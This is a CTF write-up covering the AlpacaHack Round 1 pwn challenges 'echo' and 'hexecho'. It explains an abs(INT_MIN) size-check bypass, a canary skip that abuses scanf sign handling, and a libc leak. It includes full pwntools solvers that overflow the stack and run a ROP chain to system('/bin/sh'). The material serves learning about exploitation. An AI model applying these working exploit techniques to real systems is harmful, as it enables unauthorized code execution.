AlpacaHack Round 1 (Pwn) Writeup - Part 1

This page has been machine-translated from the original page.

I finally wrote the long-postponed writeup for AlpacaHack Round 1 (Pwn).

I ran out of energy, so I will cover the remaining two challenges another time.

Reference: Challenges - AlpacaHack Round 1 (Pwn)

echo(Pwn)
hexecho(Pwn)
Summary

echo(Pwn)

A service for reachability check.

The challenge provided C source code and an executable binary.

First, I checked the binary’s protection mechanisms.

Next, I looked at the provided source code.

Since PIE is disabled, the address of win is fixed, so a simple stack buffer overflow that overwrites the return address with win looks like it should be enough to get the flag. However, the get_size function validates the input size, so the overflow cannot be triggered that easily.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define BUF_SIZE 0x100

/* Call this function! */
void win() {
  char *args[] = {"/bin/cat", "/flag.txt", NULL};
  execve(args[0], args, NULL);
  exit(1);
}

int get_size() {
  // Input size
  int size = 0;
  scanf("%d%*c", &size);

  // Validate size
  if ((size = abs(size)) > BUF_SIZE) {
    puts("[-] Invalid size");
    exit(1);
  }

  return size;
}

void get_data(char *buf, unsigned size) {
  unsigned i;
  char c;

  // Input data until newline
  for (i = 0; i < size; i++) {
    if (fread(&c, 1, 1, stdin) != 1) break;
    if (c == '\n') break;
    buf[i] = c;
  }
  buf[i] = '\0';
}

void echo() {
  int size;
  char buf[BUF_SIZE];

  // Input size
  printf("Size: ");
  size = get_size();

  // Input data
  printf("Data: ");
  get_data(buf, size);

  // Show data
  printf("Received: %s\n", buf);
}

int main() {
  setbuf(stdin, NULL);
  setbuf(stdout, NULL);
  echo();
  return 0;
}

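While looking for a way to bypass the abs call in get_size, I found that abs cannot compute the correct absolute value for INT_MIN: the mathematically correct result does not fit in an int, and in practice the call returns INT_MIN unchanged, as discussed in the reference below.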

Reference: c - Why is abs(INT_MIN) still -2147483648? - Stack Overflow

Because the result is still negative, it passes the size > BUF_SIZE check. In get_data, however, the size is treated as an unsigned int rather than an int, so by supplying INT_MIN (-2147483648) as input, the size becomes 0x80000000 and it becomes possible to write far more than 0x100 bytes into the stack buffer.
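The interaction between abs and the unsigned parameter can be modeled in a few lines of Python. This is only a sketch: it assumes a 32-bit two's-complement int and the wrap-around typically observed on x86-64 (abs(INT_MIN) is formally undefined behavior in C), and the helper names c_abs and passes_size_check are made up for illustration.

```python
import ctypes

BUF_SIZE = 0x100
INT_MIN = -2**31


def c_abs(value: int) -> int:
    """Model abs() on a 32-bit int: negate, then wrap the result to 32 bits."""
    v = ctypes.c_int32(value).value
    return ctypes.c_int32(-v if v < 0 else v).value


def passes_size_check(value: int) -> bool:
    """Mirror get_size: the program exits when abs(size) > BUF_SIZE."""
    return c_abs(value) <= BUF_SIZE


size = c_abs(INT_MIN)                      # still negative after "abs"
as_unsigned = ctypes.c_uint32(size).value  # what get_data receives as `unsigned size`

print(size, passes_size_check(INT_MIN), hex(as_unsigned))
```

Ordinary out-of-range values such as 257 or -257 are still rejected by this model; only INT_MIN slips through, because its negation wraps back to itself.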

I ultimately obtained the flag with the following solver.

from pwn import *

context.arch = "amd64"
context.endian = "little"

# Set target
TARGET_PATH = "./echo"
exe = ELF(TARGET_PATH)

target = remote("34.170.146.252", 17360, ssl=False)

# Exploit
# https://stackoverflow.com/questions/11243014/why-is-absint-min-still-2147483648
target.recvuntil(b"Size: ")
payload = b"-2147483648"
target.sendline(payload)

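target.recvuntil(b"Data: ")
# Layout used by this solver: 0x110 bytes of padding up to the saved RBP,
# 8 bytes over the saved RBP, then the new return address.
payload = flat(
    b"A"*0x110,
    b"B"*8,
    0x4011f6  # fixed address because PIE is disabled
)
target.sendline(payload)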

# Finish exploit
target.interactive()
target.clean()

This confirmed that the correct flag was Alpaca{s1Gn3d_4Nd_uNs1gn3d_s1zEs_c4n_cAu5e_s3ri0us_buGz}.
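For reference, the same payload can be built with only the standard library. This sketch reuses the offsets and the address from the solver above; the helper name build_echo_payload is hypothetical. It also checks one constraint that follows from get_data: the read loop stops at the first newline, so the payload must not contain a 0x0a byte.

```python
import struct

RET_ADDR = 0x4011f6      # address taken from the solver above
PADDING_TO_RBP = 0x110   # padding length taken from the solver above


def build_echo_payload(ret_addr: int) -> bytes:
    """Padding up to the saved RBP, 8 bytes over it, then the return address."""
    payload = b"A" * PADDING_TO_RBP
    payload += b"B" * 8
    payload += struct.pack("<Q", ret_addr)  # little-endian 64-bit address
    if b"\n" in payload:
        # get_data breaks out of its loop on '\n', truncating the payload
        raise ValueError("payload contains a newline byte")
    return payload


payload = build_echo_payload(RET_ADDR)
print(len(payload), payload[-8:].hex())
```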

hexecho(Pwn)

Stack canary makes me feel more secure.

As in the previous challenge, an executable binary and source code were provided.

This time, however, stack canaries appear to be enabled in the binary.

To solve the challenge, I examined the following source code.

It is not very different from the previous challenge, but the size validation has been removed and the input is read in hexadecimal.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define BUF_SIZE 0x100

int get_size() {
  int size = 0;
  scanf("%d%*c", &size);
  return size;
}

void get_hex(char *buf, unsigned size) {
  for (unsigned i = 0; i < size; i++)
    scanf("%02hhx", buf + i);
}

void hexecho() {
  int size;
  char buf[BUF_SIZE];

  // Input size
  printf("Size: ");
  size = get_size();

  // Input data
  printf("Data (hex): ");
  get_hex(buf, size);

  // Show data
  printf("Received: ");
  for (int i = 0; i < size; i++)
    printf("%02hhx ", (unsigned char)buf[i]);
  putchar('\n');
}

int main() {
  setbuf(stdin, NULL);
  setbuf(stdout, NULL);
  hexecho();
  return 0;
}

Since there is no size validation, exploiting the buffer overflow itself is easy, but we still need to bypass the canary.

At first, however, I could not find a way to exploit the buffer overflow without either leaking or corrupting the canary.

Reading the official writeup, I learned that the key point is that the return value of scanf("%02hhx", buf + i); is never checked.

Reference: Writeup for AlpacaHack Round 1 (Pwn) - Let’s Do CTF

scanf Specifications and How to Exploit Them

In glibc 2.35, which this challenge binary uses, scanf is implemented as follows.

This function internally uses __vfscanf_internal and returns its done value.

int __scanf (const char *format, ...)
{
  va_list arg;
  int done;

  va_start (arg, format);
  done = __vfscanf_internal(stdin, format, arg, 0);
  va_end (arg);

  return done;
}

Reference: glibc/stdio-common/scanf.c at glibc-2.35 · bminor/glibc

The vfscanf-internal.c file is roughly 3,000 lines long, and honestly I did not feel like reading all of it, but I did notice several places where ++done is executed in code that appears to perform reads.

Since scanf returns the number of items successfully read, it also seems likely that the lines immediately before ++done are where the actual reads occur.

Reference: glibc/stdio-common/vfscanf-internal.c at glibc-2.35 · bminor/glibc

Reference: scanf(3) - Linux manual page

When the input does not match the format string, scanf stops with a matching failure: it returns the number of items successfully converted so far (0 here) and leaves the offending data in the input stream.

I verified this locally with the following program: when a character that does not match the format is entered, it remains in stdin afterward.

#include <stdio.h>

int main() {
  setbuf(stdin, NULL);
  setbuf(stdout, NULL);
  char buf[100];
  int ret;
  for(int i = 0; i < 9; i++) {
    buf[i] = '-';
  }
  for(int i = 0; i < 9; i++) {
    ret = scanf("%02hhx", buf+i);
    printf("BUF ==> %c\n", buf[i]);
    printf("RET ==> %d\n", ret);
  }
  return 0;
}

Below is the state of stdin after entering a character that does not match the format.

You can see that the character I entered remains in stdin even after calling scanf.

You can also see that when invalid input causes an error, the buffer is not overwritten.

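An interesting detail here is that a sign character such as + or - is accepted as the start of a hexadecimal number, so scanf consumes it, but a sign that is not followed by a hex digit does not form a valid number for %02hhx and the conversion fails. By that point the sign has already been consumed, while nothing has been stored to the destination. This lets us consume data from the input stream while skipping scanf’s write into the buffer.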

Because this challenge fills the buffer one byte at a time using the code below, we can exploit this behavior to use the buffer overflow without overwriting the canary bytes.

void get_hex(char *buf, unsigned size) {
  for (unsigned i = 0; i < size; i++) scanf("%02hhx", buf + i);
}
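The effect on get_hex can be illustrated with a small Python model. This is a deliberately simplified sketch of how a %02hhx conversion behaves in this scenario, not glibc's implementation: it ignores the optional 0x prefix and end-of-file handling, and the names scan_hex_byte and get_hex_model are invented for this example.

```python
HEX_DIGITS = "0123456789abcdefABCDEF"


def scan_hex_byte(stream: str, pos: int, width: int = 2):
    """Model one scanf("%02hhx") call; return (new_pos, value or None)."""
    # Leading whitespace is skipped before a numeric conversion.
    while pos < len(stream) and stream[pos].isspace():
        pos += 1
    negative = False
    # An optional sign is consumed and counts toward the field width.
    if pos < len(stream) and stream[pos] in "+-":
        negative = stream[pos] == "-"
        pos += 1
        width -= 1
    digits = ""
    while width > 0 and pos < len(stream) and stream[pos] in HEX_DIGITS:
        digits += stream[pos]
        pos += 1
        width -= 1
    if not digits:
        # Matching failure: nothing is stored, but the sign stays consumed.
        return pos, None
    value = int(digits, 16)
    if negative:
        value = -value
    return pos, value & 0xFF


def get_hex_model(buf: bytearray, size: int, stream: str) -> int:
    """Model get_hex: the return value of each conversion is ignored."""
    pos = 0
    for i in range(size):
        pos, value = scan_hex_byte(stream, pos)
        if value is not None:
            buf[i] = value
    return pos


buf = bytearray(b"\xaa" * 8)          # 0xaa stands in for bytes we must not clobber
get_hex_model(buf, 8, "++++ 41 42 43 44")
print(buf.hex())
```

In this model the four + characters advance the loop index by four without touching the first four bytes, which is the property the canary bypass relies on.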

Bypassing the Canary

Based on the above, I successfully bypassed the canary with the following payload.

payload = flat(
    b"+"*0x118,
    b"42"*0x100
)

# Exploit
target.recvuntil(b"Size: ")
target.sendline(str(0x118 + (0x100//2)).encode())

target.recvuntil(b"Data (hex): ")
target.sendline(payload)

After that, all that remained was to build a working ROP chain and get a shell.

Leaking libc

To get a shell with ROP, I next needed a way to leak a libc address.

At first I considered leaking it via ROP, but on closer inspection the output loop, printf("%02hhx ", (unsigned char)buf[i]);, prints size bytes starting at buf, so with a size larger than BUF_SIZE it simply dumps the stack contents beyond the buffer.

Using this, I was able to obtain the address of libc_start_main_ret from the dumped stack.
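Recovering the address from the dump is plain byte parsing. The following sketch uses only the standard library; the byte index (296, i.e. 0x128) and the offset 0x29d90 are the values used in the solver later in this writeup, while the helper names and the sample address are made up to exercise the parsing.

```python
import struct

LIBC_START_MAIN_RET_OFFSET = 0x29d90  # offset used in the solver for this libc
LEAK_INDEX = 0x128                    # byte index of the leaked address (296)


def parse_received(line: str) -> bytes:
    """Turn 'Received: 41 42 ... ' into raw bytes."""
    tokens = line.split()[1:]  # drop the 'Received:' label
    return bytes(int(t, 16) for t in tokens)


def leak_u64(dump: bytes, index: int) -> int:
    """Read a little-endian 64-bit value at the given byte index."""
    return int.from_bytes(dump[index:index + 8], "little")


# Synthetic dump with a made-up address, only to exercise the parsing.
fake_addr = 0x7ffff7c29d90
fake_dump = bytes(LEAK_INDEX) + struct.pack("<Q", fake_addr)
line = "Received: " + " ".join(f"{b:02x}" for b in fake_dump) + " "

leak = leak_u64(parse_received(line), LEAK_INDEX)
libc_base = leak - LIBC_START_MAIN_RET_OFFSET
print(hex(leak), hex(libc_base))
```

A quick sanity check on a real leak is that the computed base should be page-aligned (low 12 bits zero).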

Exploit

After successfully bypassing the canary and leaking a libc address, I exploited the buffer overflow to execute a ROP chain, obtained a shell, and then got the flag.

The final solver I wrote is shown below.

One thing that tripped me up: when I tried to overwrite the buffer via scanf("%02hhx", buf + i); with unseparated input such as 22134000, the bytes were stored as 02 02 13 40 rather than the values I intended.

Separating the input values with spaces made it parse them correctly.
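The space-separated encoding can be wrapped in small helpers. This is a sketch using only the standard library; hex_bytes and build_stage are hypothetical names, and the two addresses in the usage lines are the ones that appear in the solver.

```python
import struct


def hex_bytes(value: int) -> str:
    """Encode a 64-bit value as little-endian, space-separated hex bytes."""
    return " ".join(f"{b:02X}" for b in struct.pack("<Q", value))


def build_stage(skip: int, qwords, tail_skip: int = 0):
    """Return (size, payload): skip bytes with '+', write qwords, skip a tail."""
    body = "+" * skip
    for q in qwords:
        body += " " + hex_bytes(q)   # the space keeps each byte a separate token
    body += "+" * tail_skip
    # One scanf call per skipped byte and one per written byte.
    size = skip + 8 * len(qwords) + tail_skip
    return size, body.encode()


size, payload = build_stage(0x118, [0x401370, 0x401322], tail_skip=8)
print(size, payload[0x118:])
```

Returning the size together with the payload keeps the number sent at the Size prompt consistent with the number of conversions the payload is meant to drive.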

from pwn import *

# Set context
# context.log_level = "debug"
context.arch = "amd64"
context.endian = "little"
context.word_size = 64
context.terminal = ["/mnt/c/Windows/system32/cmd.exe", "/c", "start", "wt.exe", "-w", "0", "sp", "-s", ".75", "-d", ".", "wsl.exe", '-d', "Ubuntu", "bash", "-c"]

# Set gdb script
gdbscript = f"""
b *0x401321
continue
"""

# Set target
TARGET_PATH = "./hexecho"
exe = ELF(TARGET_PATH)

# Run program
is_gdb = False  # set to True to debug locally under gdb
if is_gdb:
    target = gdb.debug(TARGET_PATH, aslr=False, gdbscript=gdbscript)
else:
    target = remote("34.170.146.252", 29181, ssl=False)
    # target = process(TARGET_PATH)

rop_ret = " ".join([f"{x:0{2}X}" for x in p64(0x401370)]).encode()

payload = b"+"*0x118
payload += b" "
payload += rop_ret
payload += b" "
payload += " ".join([f"{x:0{2}X}" for x in p64(0x401322)]).encode()
payload += b"+"*0x8

# Exploit
target.recvuntil(b"Size: ")
target.sendline(str(0x118+8+8+8).encode())

target.recvuntil(b"Data (hex): ")
target.sendline(payload)

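# The echoed dump contains one hex byte per space-separated token
r = target.recvline_startswith(b"Received").decode().split(" ")[1:-1]

# Bytes 296..303 (offset 0x128) hold libc_start_main_ret in little-endian order
libc_start_main_ret = int("0x" + "".join(r[296:296+8][::-1]),16)
libc_base = libc_start_main_ret - 0x29d90
print(hex(libc_start_main_ret))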


# Stage 2
rop_str_bin_sh = " ".join([f"{x:0{2}X}" for x in p64(libc_base+0x1d8678)]).encode()
rop_pop_rdi_ret = " ".join([f"{x:0{2}X}" for x in p64(libc_base+0x1bbea1)]).encode()
rop_system = " ".join([f"{x:0{2}X}" for x in p64(libc_base+0x50d70)]).encode()

payload = b"+"*0x118
payload += b" "
payload += rop_ret
payload += b" "
payload += rop_pop_rdi_ret
payload += b" "
payload += rop_str_bin_sh
payload += b" "
payload += rop_system
payload += b"+"*0x30

target.recvuntil(b"Size: ")
target.sendline(str(0x118 + 0x30).encode())

target.recvuntil(b"Data (hex): ")
target.sendline(payload)

# Finish exploit
target.interactive()
target.clean()

Summary

I finally got around to writing this long-delayed writeup for AlpacaHack Round 1 (Pwn).

I had planned to write up the remaining two challenges as well, but I ran out of energy, so for now I only covered these two.

Published Oct 19, 2024

Aspiring Reverse Engineer and CTF Player (Team: 0nePadding). Passionate about WinDbg and Anti-Virus internals. OSCP / CISSP. Working at Microsoft Japan, but all views expressed are my own. かしわば (@kash1064) on Twitter